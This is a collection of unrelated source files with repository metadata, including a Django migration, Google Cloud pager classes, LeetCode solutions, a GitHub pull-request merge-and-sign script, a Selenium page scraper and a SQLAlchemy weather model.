b6719129deb3753fda7d1da2bf054ef2b0b7086b | bb4e132c5978a1edc2ef4fb78d1bb5a793809408 | /dral_text/migrations/0005_auto_20180421_2332.py | 2011d67aa3e519a34a52ebb3021d281bc28eafa0 | [
"MIT"
] | permissive | n-romanova/dral-django | 7335e581f1fffe0e2d42614678010ead5c9202f3 | 4af92a46e207cc8a427d2f8eafe688c61a73d39e | refs/heads/master | 2020-08-31T03:11:37.199516 | 2019-10-03T17:19:05 | 2019-10-03T17:19:05 | 218,569,974 | 0 | 0 | null | 2019-10-30T16:15:47 | 2019-10-30T16:15:47 | null | UTF-8 | Python | false | false | 707 | py | # Generated by Django 2.0 on 2018-04-21 22:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dral_text', '0004_auto_20180421_2231'),
]
operations = [
migrations.AddField(
model_name='occurence',
name='paraphrase',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='occurence',
name='replace',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='occurence',
name='zero',
field=models.BooleanField(default=False),
),
]
| [
"[email protected]"
] | |
803f3401202b20729ba63a9968b76cfb69eb1b03 | c558d1da1aedf377e6cb6cf66c5136cfb7c32167 | /python-new-trunk/sfapi2/sflib/runWithAnalysis.py | 978d569bb74522ab578050a8fad567a9a6a3a256 | [
"CC0-1.0"
] | permissive | raychorn/svn_molten-magma | 46a8da015844b52fd2fc777225f11b1891b0000a | 8aa2ff2340707eecae6514943e86f5afba9cd54a | refs/heads/main | 2022-12-26T15:45:24.851522 | 2020-10-15T16:52:04 | 2020-10-15T16:52:04 | 304,358,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,864 | py | import os, sys
import traceback
from vyperlogix import misc
from vyperlogix.misc import ioTimeAnalysis
import types
import SfStats
sf_stats = SfStats.SfStats()
def dummy():
pass
def init_AnalysisDataPoint(name):
ioTimeAnalysis.initIOTime(name)
def begin_AnalysisDataPoint(name):
ioTimeAnalysis.ioBeginTime(name)
def end_AnalysisDataPoint(name):
ioTimeAnalysis.ioEndTime(name)
def count_query():
sf_stats.count_query()
def runWithAnalysis(func=dummy,args=[],_ioElapsedTime=dummy):
caller = misc.callersName()
ioTimeAnalysis.initIOTime('%s::%s' % (__name__,caller))
ioTimeAnalysis.ioBeginTime('%s::%s' % (__name__,caller))
val = None
try:
if (len(args) == 0):
val = func()
else:
val = func(args)
except:
exc_info = sys.exc_info()
info_string = '\n'.join(traceback.format_exception(*exc_info))
print >>sys.stderr, '(%s) Reason: %s' % (misc.funcName(),info_string)
ioTimeAnalysis.ioEndTime('%s::%s' % (__name__,caller))
ioTimeAnalysis.ioTimeAnalysisReport()
_et = 0
_key_list = [k for k in ioTimeAnalysis._ioTime.keys() if (k.find('SOQL') > -1)]
for _key in _key_list:
_et += (0 if (len(_key) == 0) else ioTimeAnalysis._ioTime[_key][0])
if (_et > 0):
_soql_per_sec = sf_stats.query_count / _et
if (_soql_per_sec > 0):
_ms_per_soql = 1000 / _soql_per_sec
else:
if (sf_stats.query_count == 0):
print >>sys.stderr, '(%s) 1.0 Cannot correctly report ms per SOQL because SOQL per Second reported 0 and we cannot divide Zero by some number at this time; recommend using the functions that count queries from this module.' % (misc.funcName())
elif ():
print >>sys.stderr, '(%s) 1.0 Cannot correctly report ms per SOQL because SOQL per Second reported 0 and we cannot divide by Zero at this time.' % (misc.funcName())
_ms_per_soql = -1
else:
print >>sys.stderr, '(%s) 1.0 Cannot correctly report ms per SOQL because SOQL per Second because there is no reported elapsed time from SOQL activities.' % (misc.funcName())
try:
v_ioElapsedTime = float(ioTimeAnalysis._ioElapsedTime)
if (v_ioElapsedTime > 0):
soql_per_sec = sf_stats.query_count / v_ioElapsedTime
if (soql_per_sec > 0):
ms_per_soql = 1000 / soql_per_sec
else:
print >>sys.stderr, '(%s) 2.0 Cannot correctly report ms per SOQL because SOQL per Second reported 0 and we cannot divide by Zero at this time.' % (misc.funcName())
ms_per_soql = -1
t_analysis_1 = '%-10.2f' % soql_per_sec
t_analysis_2 = '%-10.4f' % ms_per_soql
print >>sys.stdout, '(Apparent) SOQL per second = %s or %s ms per SOQL.' % (t_analysis_1.strip(),t_analysis_2.strip())
if (_et > 0):
_t_analysis_1 = '%-10.2f' % _soql_per_sec
_t_analysis_2 = '%-10.4f' % _ms_per_soql
print >>sys.stdout, '(Actual) SOQL per second = %s or %s ms per SOQL.' % (_t_analysis_1.strip(),_t_analysis_2.strip())
else:
print >>sys.stderr, 'Unable to perform Actual SOQL per second analysis because there is no reported elapsed time from SOQL activities.'
else:
print >>sys.stderr, 'Unable to perform Actual SOQL per second analysis because _ioElapsedTime is %4.2f.' % (v_ioElapsedTime)
except:
exc_info = sys.exc_info()
info_string = '\n'.join(traceback.format_exception(*exc_info))
print >>sys.stderr, '(%s) Reason: %s' % (misc.funcName(),info_string)
print >>sys.stdout, 'SOQL Count=%d' % sf_stats.query_count
return val
| [
"[email protected]"
] | |
9301a8e19c39fa597a374ec83ca5ac9308d25d56 | e9032e64138d7b9dd90a330dfe4588e2c83f6667 | /google/cloud/compute_v1/services/url_maps/pagers.py | 1a5d42fc43ca21958c622ecbbf65987afbee0aa4 | [
"Apache-2.0"
] | permissive | Ctfbuster/python-compute | 6cff2418969009794c3fadadc4c45e20d7b40509 | 7a9e8324e08c46a93050908760b2b5aca054a863 | refs/heads/main | 2023-08-26T12:37:52.363526 | 2021-10-04T15:34:37 | 2021-10-04T15:34:37 | 412,884,620 | 0 | 0 | Apache-2.0 | 2021-10-02T18:49:05 | 2021-10-02T18:49:03 | null | UTF-8 | Python | false | false | 5,578 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import (
Any,
AsyncIterable,
Awaitable,
Callable,
Iterable,
Sequence,
Tuple,
Optional,
)
from google.cloud.compute_v1.types import compute
class AggregatedListPager:
"""A pager for iterating through ``aggregated_list`` requests.
This class thinly wraps an initial
:class:`google.cloud.compute_v1.types.UrlMapsAggregatedList` object, and
provides an ``__iter__`` method to iterate through its
``items`` field.
If there are more pages, the ``__iter__`` method will make additional
``AggregatedList`` requests and continue to iterate
through the ``items`` field on the
corresponding responses.
All the usual :class:`google.cloud.compute_v1.types.UrlMapsAggregatedList`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., compute.UrlMapsAggregatedList],
request: compute.AggregatedListUrlMapsRequest,
response: compute.UrlMapsAggregatedList,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.compute_v1.types.AggregatedListUrlMapsRequest):
The initial request object.
response (google.cloud.compute_v1.types.UrlMapsAggregatedList):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = compute.AggregatedListUrlMapsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[compute.UrlMapsAggregatedList]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[Tuple[str, compute.UrlMapsScopedList]]:
for page in self.pages:
yield from page.items.items()
def get(self, key: str) -> Optional[compute.UrlMapsScopedList]:
return self._response.items.get(key)
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
class ListPager:
"""A pager for iterating through ``list`` requests.
This class thinly wraps an initial
:class:`google.cloud.compute_v1.types.UrlMapList` object, and
provides an ``__iter__`` method to iterate through its
``items`` field.
If there are more pages, the ``__iter__`` method will make additional
``List`` requests and continue to iterate
through the ``items`` field on the
corresponding responses.
All the usual :class:`google.cloud.compute_v1.types.UrlMapList`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., compute.UrlMapList],
request: compute.ListUrlMapsRequest,
response: compute.UrlMapList,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.compute_v1.types.ListUrlMapsRequest):
The initial request object.
response (google.cloud.compute_v1.types.UrlMapList):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = compute.ListUrlMapsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[compute.UrlMapList]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[compute.UrlMap]:
for page in self.pages:
yield from page.items
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
| [
"[email protected]"
] | |
e40a9f4648944ecbb580038b5267b736e6a1cc7a | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /TmasgxCm6iz3gTGHk_18.py | f0c40f2ac8ab47faef818d3f66b85e4ebaed9fb1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | """
Write a function that returns the **length of the shortest contiguous
sublist** whose sum of all elements **strictly exceeds** `n`.
### Examples
min_length([5, 8, 2, -1, 3, 4], 9) ➞ 2
min_length([3, -1, 4, -2, -7, 2], 4) ➞ 3
# Shortest sublist whose sum exceeds 4 is: [3, -1, 4]
min_length([1, 0, 0, 0, 1], 1) ➞ 5
min_length([0, 1, 1, 0], 2) ➞ -1
### Notes
* The sublist should be composed of **contiguous elements** from the original list.
* If no such sublist exists, return `-1`.
"""
def min_length(lst, n):
for i in range(1, len(lst) + 1):
v = [lst[j:j + i] for j in range(0, len(lst) - i + 1)]
for k in v:
if sum(k) > n:
return i
return -1
| [
"[email protected]"
] | |
5ebff17593beda1effd5a60635d6921fc7b98ab2 | 07cabeb47bd7c9a4e06e824ece28631c7d7441a1 | /virtual/bin/easy_install | d66210d85b88436a51d477c4ceeb85a8a146d4c6 | [
"MIT"
] | permissive | Jeffmusa/PITCH-POOL | bd2b27ea5bc5b47499c0b822c46ff518eae5f2f4 | 96654a3ba7fc3f4ba00d7fb617644cc9cd5ba041 | refs/heads/master | 2020-03-28T04:17:07.471479 | 2018-09-13T13:21:17 | 2018-09-13T13:21:17 | 147,705,197 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/vicklyne/Pitch/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
ed4725673a73387fa9143bfc3a1a63fd28e669a2 | 9cabdeb8dce5718e8f4f490f3684eba0eb1f2d2e | /contrib/devtools/github-merge.py | 709b20287ca325e74972a29584e54ec67e442f2a | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | wolfoxonly/woo | fcfe275007cb102fff10239b0f722264dbbd40e2 | a5fb13575afe855b58915bd8e15cbffb9015e5e2 | refs/heads/master | 2020-03-09T17:00:57.668308 | 2018-05-13T15:21:17 | 2018-05-13T15:21:17 | 127,590,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,970 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2017 Woochain Core Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# This script will locally construct a merge commit for a pull request on a
# github repository, inspect it, sign it and optionally push it.
# The following temporary branches are created/overwritten and deleted:
# * pull/$PULL/base (the current master we're merging onto)
# * pull/$PULL/head (the current state of the remote pull request)
# * pull/$PULL/merge (github's merge)
# * pull/$PULL/local-merge (our merge)
# In case of a clean merge that is accepted by the user, the local branch with
# name $BRANCH is overwritten with the merged result, and optionally pushed.
from __future__ import division,print_function,unicode_literals
import os
from sys import stdin,stdout,stderr
import argparse
import hashlib
import subprocess
import sys
import json,codecs
try:
from urllib.request import Request,urlopen
except:
from urllib2 import Request,urlopen
# External tools (can be overridden using environment)
GIT = os.getenv('GIT','git')
BASH = os.getenv('BASH','bash')
# OS specific configuration for terminal attributes
ATTR_RESET = ''
ATTR_PR = ''
COMMIT_FORMAT = '%h %s (%an)%d'
if os.name == 'posix': # if posix, assume we can use basic terminal escapes
ATTR_RESET = '\033[0m'
ATTR_PR = '\033[1;36m'
COMMIT_FORMAT = '%C(bold blue)%h%Creset %s %C(cyan)(%an)%Creset%C(green)%d%Creset'
def git_config_get(option, default=None):
'''
Get named configuration option from git repository.
'''
try:
return subprocess.check_output([GIT,'config','--get',option]).rstrip().decode('utf-8')
except subprocess.CalledProcessError as e:
return default
def retrieve_pr_info(repo,pull):
'''
Retrieve pull request information from github.
Return None if no title can be found, or an error happens.
'''
try:
req = Request("https://api.github.com/repos/"+repo+"/pulls/"+pull)
result = urlopen(req)
reader = codecs.getreader('utf-8')
obj = json.load(reader(result))
return obj
except Exception as e:
print('Warning: unable to retrieve pull information from github: %s' % e)
return None
def ask_prompt(text):
print(text,end=" ",file=stderr)
stderr.flush()
reply = stdin.readline().rstrip()
print("",file=stderr)
return reply
def get_symlink_files():
files = sorted(subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', 'HEAD']).splitlines())
ret = []
for f in files:
if (int(f.decode('utf-8').split(" ")[0], 8) & 0o170000) == 0o120000:
ret.append(f.decode('utf-8').split("\t")[1])
return ret
def tree_sha512sum(commit='HEAD'):
# request metadata for entire tree, recursively
files = []
blob_by_name = {}
for line in subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', commit]).splitlines():
name_sep = line.index(b'\t')
metadata = line[:name_sep].split() # perms, 'blob', blobid
assert(metadata[1] == b'blob')
name = line[name_sep+1:]
files.append(name)
blob_by_name[name] = metadata[2]
files.sort()
# open connection to git-cat-file in batch mode to request data for all blobs
# this is much faster than launching it per file
p = subprocess.Popen([GIT, 'cat-file', '--batch'], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
overall = hashlib.sha512()
for f in files:
blob = blob_by_name[f]
# request blob
p.stdin.write(blob + b'\n')
p.stdin.flush()
# read header: blob, "blob", size
reply = p.stdout.readline().split()
assert(reply[0] == blob and reply[1] == b'blob')
size = int(reply[2])
# hash the blob data
intern = hashlib.sha512()
ptr = 0
while ptr < size:
bs = min(65536, size - ptr)
piece = p.stdout.read(bs)
if len(piece) == bs:
intern.update(piece)
else:
raise IOError('Premature EOF reading git cat-file output')
ptr += bs
dig = intern.hexdigest()
assert(p.stdout.read(1) == b'\n') # ignore LF that follows blob data
# update overall hash with file hash
overall.update(dig.encode("utf-8"))
overall.update(" ".encode("utf-8"))
overall.update(f)
overall.update("\n".encode("utf-8"))
p.stdin.close()
if p.wait():
raise IOError('Non-zero return value executing git cat-file')
return overall.hexdigest()
def print_merge_details(pull, title, branch, base_branch, head_branch):
print('%s#%s%s %s %sinto %s%s' % (ATTR_RESET+ATTR_PR,pull,ATTR_RESET,title,ATTR_RESET+ATTR_PR,branch,ATTR_RESET))
subprocess.check_call([GIT,'log','--graph','--topo-order','--pretty=format:'+COMMIT_FORMAT,base_branch+'..'+head_branch])
def parse_arguments():
epilog = '''
In addition, you can set the following git configuration variables:
githubmerge.repository (mandatory),
user.signingkey (mandatory),
githubmerge.host (default: [email protected]),
githubmerge.branch (no default),
githubmerge.testcmd (default: none).
'''
parser = argparse.ArgumentParser(description='Utility to merge, sign and push github pull requests',
epilog=epilog)
parser.add_argument('pull', metavar='PULL', type=int, nargs=1,
help='Pull request ID to merge')
parser.add_argument('branch', metavar='BRANCH', type=str, nargs='?',
default=None, help='Branch to merge against (default: githubmerge.branch setting, or base branch for pull, or \'master\')')
return parser.parse_args()
def main():
# Extract settings from git repo
repo = git_config_get('githubmerge.repository')
host = git_config_get('githubmerge.host','[email protected]')
opt_branch = git_config_get('githubmerge.branch',None)
testcmd = git_config_get('githubmerge.testcmd')
signingkey = git_config_get('user.signingkey')
if repo is None:
print("ERROR: No repository configured. Use this command to set:", file=stderr)
print("git config githubmerge.repository <owner>/<repo>", file=stderr)
sys.exit(1)
if signingkey is None:
print("ERROR: No GPG signing key set. Set one using:",file=stderr)
print("git config --global user.signingkey <key>",file=stderr)
sys.exit(1)
host_repo = host+":"+repo # shortcut for push/pull target
# Extract settings from command line
args = parse_arguments()
pull = str(args.pull[0])
# Receive pull information from github
info = retrieve_pr_info(repo,pull)
if info is None:
sys.exit(1)
title = info['title'].strip()
body = info['body'].strip()
# precedence order for destination branch argument:
# - command line argument
# - githubmerge.branch setting
# - base branch for pull (as retrieved from github)
# - 'master'
branch = args.branch or opt_branch or info['base']['ref'] or 'master'
# Initialize source branches
head_branch = 'pull/'+pull+'/head'
base_branch = 'pull/'+pull+'/base'
merge_branch = 'pull/'+pull+'/merge'
local_merge_branch = 'pull/'+pull+'/local-merge'
devnull = open(os.devnull,'w')
try:
subprocess.check_call([GIT,'checkout','-q',branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot check out branch %s." % (branch), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/pull/'+pull+'/*:refs/heads/pull/'+pull+'/*',
'+refs/heads/'+branch+':refs/heads/'+base_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find pull request #%s or branch %s on %s." % (pull,branch,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+head_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find head of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+merge_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find merge of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
subprocess.check_call([GIT,'checkout','-q',base_branch])
subprocess.call([GIT,'branch','-q','-D',local_merge_branch], stderr=devnull)
subprocess.check_call([GIT,'checkout','-q','-b',local_merge_branch])
try:
# Go up to the repository's root.
toplevel = subprocess.check_output([GIT,'rev-parse','--show-toplevel']).strip()
os.chdir(toplevel)
# Create unsigned merge commit.
if title:
firstline = 'Merge #%s: %s' % (pull,title)
else:
firstline = 'Merge #%s' % (pull,)
message = firstline + '\n\n'
message += subprocess.check_output([GIT,'log','--no-merges','--topo-order','--pretty=format:%h %s (%an)',base_branch+'..'+head_branch]).decode('utf-8')
message += '\n\nPull request description:\n\n ' + body.replace('\n', '\n ') + '\n'
try:
subprocess.check_call([GIT,'merge','-q','--commit','--no-edit','--no-ff','-m',message.encode('utf-8'),head_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot be merged cleanly.",file=stderr)
subprocess.check_call([GIT,'merge','--abort'])
sys.exit(4)
logmsg = subprocess.check_output([GIT,'log','--pretty=format:%s','-n','1']).decode('utf-8')
if logmsg.rstrip() != firstline.rstrip():
print("ERROR: Creating merge failed (already merged?).",file=stderr)
sys.exit(4)
symlink_files = get_symlink_files()
for f in symlink_files:
print("ERROR: File %s was a symlink" % f)
if len(symlink_files) > 0:
sys.exit(4)
# Put tree SHA512 into the message
try:
first_sha512 = tree_sha512sum()
message += '\n\nTree-SHA512: ' + first_sha512
except subprocess.CalledProcessError as e:
print("ERROR: Unable to compute tree hash")
sys.exit(4)
try:
subprocess.check_call([GIT,'commit','--amend','-m',message.encode('utf-8')])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot update message.", file=stderr)
sys.exit(4)
print_merge_details(pull, title, branch, base_branch, head_branch)
print()
# Run test command if configured.
if testcmd:
if subprocess.call(testcmd,shell=True):
print("ERROR: Running %s failed." % testcmd,file=stderr)
sys.exit(5)
# Show the created merge.
diff = subprocess.check_output([GIT,'diff',merge_branch+'..'+local_merge_branch])
subprocess.check_call([GIT,'diff',base_branch+'..'+local_merge_branch])
if diff:
print("WARNING: merge differs from github!",file=stderr)
reply = ask_prompt("Type 'ignore' to continue.")
if reply.lower() == 'ignore':
print("Difference with github ignored.",file=stderr)
else:
sys.exit(6)
else:
# Verify the result manually.
print("Dropping you on a shell so you can try building/testing the merged source.",file=stderr)
print("Run 'git diff HEAD~' to show the changes being merged.",file=stderr)
print("Type 'exit' when done.",file=stderr)
if os.path.isfile('/etc/debian_version'): # Show pull number on Debian default prompt
os.putenv('debian_chroot',pull)
subprocess.call([BASH,'-i'])
second_sha512 = tree_sha512sum()
if first_sha512 != second_sha512:
print("ERROR: Tree hash changed unexpectedly",file=stderr)
sys.exit(8)
# Sign the merge commit.
print_merge_details(pull, title, branch, base_branch, head_branch)
while True:
reply = ask_prompt("Type 's' to sign off on the above merge, or 'x' to reject and exit.").lower()
if reply == 's':
try:
subprocess.check_call([GIT,'commit','-q','--gpg-sign','--amend','--no-edit'])
break
except subprocess.CalledProcessError as e:
print("Error while signing, asking again.",file=stderr)
elif reply == 'x':
print("Not signing off on merge, exiting.",file=stderr)
sys.exit(1)
# Put the result in branch.
subprocess.check_call([GIT,'checkout','-q',branch])
subprocess.check_call([GIT,'reset','-q','--hard',local_merge_branch])
finally:
# Clean up temporary branches.
subprocess.call([GIT,'checkout','-q',branch])
subprocess.call([GIT,'branch','-q','-D',head_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',base_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',merge_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',local_merge_branch],stderr=devnull)
# Push the result.
while True:
reply = ask_prompt("Type 'push' to push the result to %s, branch %s, or 'x' to exit without pushing." % (host_repo,branch)).lower()
if reply == 'push':
subprocess.check_call([GIT,'push',host_repo,'refs/heads/'+branch])
break
elif reply == 'x':
sys.exit(1)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
349da3c46b25c597a4fea4b6ffed199281d111b3 | e61e664d95af3b93150cda5b92695be6551d2a7c | /vega/metrics/tensorflow/__init__.py | 5eb861df8a3c94200471f2efbde2cb138194a48e | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | huawei-noah/vega | 44aaf8bb28b45f707ed6cd4e871ba70fc0c04846 | 12e37a1991eb6771a2999fe0a46ddda920c47948 | refs/heads/master | 2023-09-01T20:16:28.746745 | 2023-02-15T09:36:59 | 2023-02-15T09:36:59 | 273,667,533 | 850 | 184 | NOASSERTION | 2023-02-15T09:37:01 | 2020-06-20T08:20:06 | Python | UTF-8 | Python | false | false | 449 | py | from vega.common.class_factory import ClassFactory
from .metrics import Metrics
ClassFactory.lazy_register("vega.metrics.tensorflow", {
"segmentation_metric": ["trainer.metric:IoUMetric"],
"classifier_metric": ["trainer.metric:accuracy"],
"sr_metric": ["trainer.metric:PSNR", "trainer.metric:SSIM"],
"forecast": ["trainer.metric:MSE", "trainer.metric:RMSE"],
"r2score": ["trainer.metric:r2score", "trainer.metric:R2Score"],
})
| [
"[email protected]"
] | |
d9d15c7369252080d67b4a3db18eda581179e3b9 | 7950c4faf15ec1dc217391d839ddc21efd174ede | /contest/weekly-contest-266/5919.0_Vowels_of_All_Substrings.py | 836bcb1c21e6f95554a3972b51237f0616b166fa | [] | no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,835 | py | '''
41 / 51 个通过测试用例
状态:超出时间限制
brute force
T: O(N^2)
S: O(N)
'''
class Solution:
def countVowels(self, word: str) -> int:
N = len(word)
pre = [0] * (N + 1)
for i, ch in enumerate(word):
if ch in 'aeiou':
pre[i + 1] = pre[i] + 1
else:
pre[i + 1] = pre[i]
ans = 0
for i in range(1, len(word) + 1):
for j in range(i):
ans += pre[i] - pre[j]
return ans
'''
"aba"
0112
'''
'''
前缀和+前缀和
这是从双层暴力优化过来的
通过
296 ms 23.8 MB Python3 2021/11/07 19:48
T: O(3N)
S: O(2N)
ref:
https://leetcode-cn.com/problems/vowels-of-all-substrings/solution/cqian-zhui-he-qian-zhui-he-by-answerer-360n/
'''
class Solution:
def countVowels(self, word: str) -> int:
N = len(word)
pre = [0] * (N + 1)
for i, ch in enumerate(word):
if ch in 'aeiou':
pre[i + 1] = pre[i] + 1
else:
pre[i + 1] = pre[i]
# presum of presum
prepre = [0] * (N + 1)
for i in range(1, N + 1):
prepre[i] = prepre[i - 1] + pre[i]
ans = 0
for i in range(N):
ans += pre[i + 1] * (i + 1) - prepre[i]
return ans
'''
乘法原理
T: O(N)
S: O(1)
执行用时:92 ms, 在所有 Python3 提交中击败了100.00% 的用户
内存消耗:15.2 MB, 在所有 Python3 提交中击败了100.00% 的用户
通过测试用例:51 / 51
'''
class Solution:
def countVowels(self, word: str) -> int:
ans, N = 0, len(word)
for i, ch in enumerate(word):
if ch in 'aeiou':
ans += (i + 1) * (N - i)
return ans
| [
"[email protected]"
] | |
958e5eceba3a97c5f73ae5f97c2f2d507c3228c4 | 8f8498bb6f56b19d45a1989c8113a077348c0a02 | /백준/최소신장트리/행성 터널 - 프림.py | 1b9cd115b4de9658e77fc0d211d97f40b0242f95 | [] | no_license | gjtjdtn201/practice | a09b437c892b0b601e156c09cb1f053b52fab11b | ea45582b2773616b2b8f350b927559210009d89f | refs/heads/master | 2021-01-01T13:29:46.640740 | 2020-11-28T00:55:37 | 2020-11-28T00:55:37 | 239,299,485 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 800 | py | import sys
sys.stdin = open('행성 터널.txt')
import sys
input = sys.stdin.readline
from heapq import heappush, heappop
N = int(input())
star = []
for i in range(N):
x, y, z = map(int, input().split())
star.append((x, y, z, i))
edges = [[] for _ in range(N)]
for i in range(3):
star.sort(key=lambda x: x[i])
for j in range(N-1):
n1, n2 = star[j][3], star[j+1][3]
cost = abs(star[j][i]-star[j+1][i])
edges[n1].append((cost, n2))
edges[n2].append((cost, n1))
mst = [False]*N
ans = 0
q = []
heappush(q, (0, 0))
while q:
cost, node = heappop(q)
if mst[node]:
continue
ans += cost
mst[node] = True
for nxt_cost, nxt in edges[node]:
if mst[nxt]:
continue
heappush(q, (nxt_cost, nxt))
print(ans) | [
"[email protected]"
] | |
05bbe819c737091fa9d1aff4a383a5ca8734dd1c | 461cf2fd99330558ec96bf551cb1703e627868a0 | /get_pages.py | b050961df0e6de3f1240f8bc48e06c5237fb092d | [] | no_license | abelsonlive/bcni-pra | 408f72ba369ca164c5efb4442ebd2eaeb2c8dd78 | fa51ae45382c45f15fe861060d6e90cc00c27590 | refs/heads/master | 2021-01-20T11:50:13.432486 | 2013-04-29T14:45:04 | 2013-04-29T14:45:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | import selenium
from selenium import webdriver
import time
URL = "http://secure.phila.gov/paplpublicweb/GridView.aspx"
b = webdriver.Firefox()
b.get(URL)
for i in range(2, 806):
print i
text = b.page_source.encode('utf-8')
fp = "raw_pages/page%s.txt" % (i-1)
print "writing", fp, "to file"
with open(fp, "w") as text_file:
text_file.write(text)
try:
next = b.find_element_by_xpath("//span[contains(text(),'%s')]" % (i))
except selenium.common.exceptions.NoSuchElementException or selenium.common.exceptions.StaleElementReferenceException:
print "ERROR ERROR!!!"
i = i - 1
print "trying again"
next.click()
time.sleep(2)
b.close()
| [
"[email protected]"
] | |
a73c7308d19a2723bbdb73a89ceca2790e0ddbea | 3a10cda6dbdeee36b24591ada2c551ff2f179d19 | /app/models/hour.py | 1a14852b19fe5a1765504a13f12ccb678185c99c | [] | no_license | ttecles/weather_backend | a0d0c6317c3fde6c4ac6df17c7c9a5ea59299302 | b4b2886a3f0a2b6b502bd38d0b98f017b01ef6b0 | refs/heads/master | 2023-02-19T12:31:52.295041 | 2021-01-26T08:56:34 | 2021-01-26T08:56:34 | 330,950,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 763 | py | from app import db
class Hour(db.Model):
__tablename__ = 'Hour'
locality_id = db.Column(db.Integer, db.ForeignKey('Locality.id'), primary_key=True, nullable=False)
date = db.Column(db.Date(), primary_key=True) # "2021-1-15"
hour_data = db.Column(db.Time(), primary_key=True) # "13:00",
temperature = db.Column(db.Integer) # -1,
icon = db.Column(db.String(10)) # "6",
text = db.Column(db.String(80)) # "Mostly cloudy",
humidity = db.Column(db.Integer) # 89,
wind = db.Column(db.Integer) # 4,
wind_direction = db.Column(db.String(30)) # "Northwest",
icon_wind = db.Column(db.String(10)) # "NO",
pressure = db.Column(db.Integer) # 1016,
locality = db.relationship("Locality", backref="hour_forecast")
| [
"[email protected]"
] | |
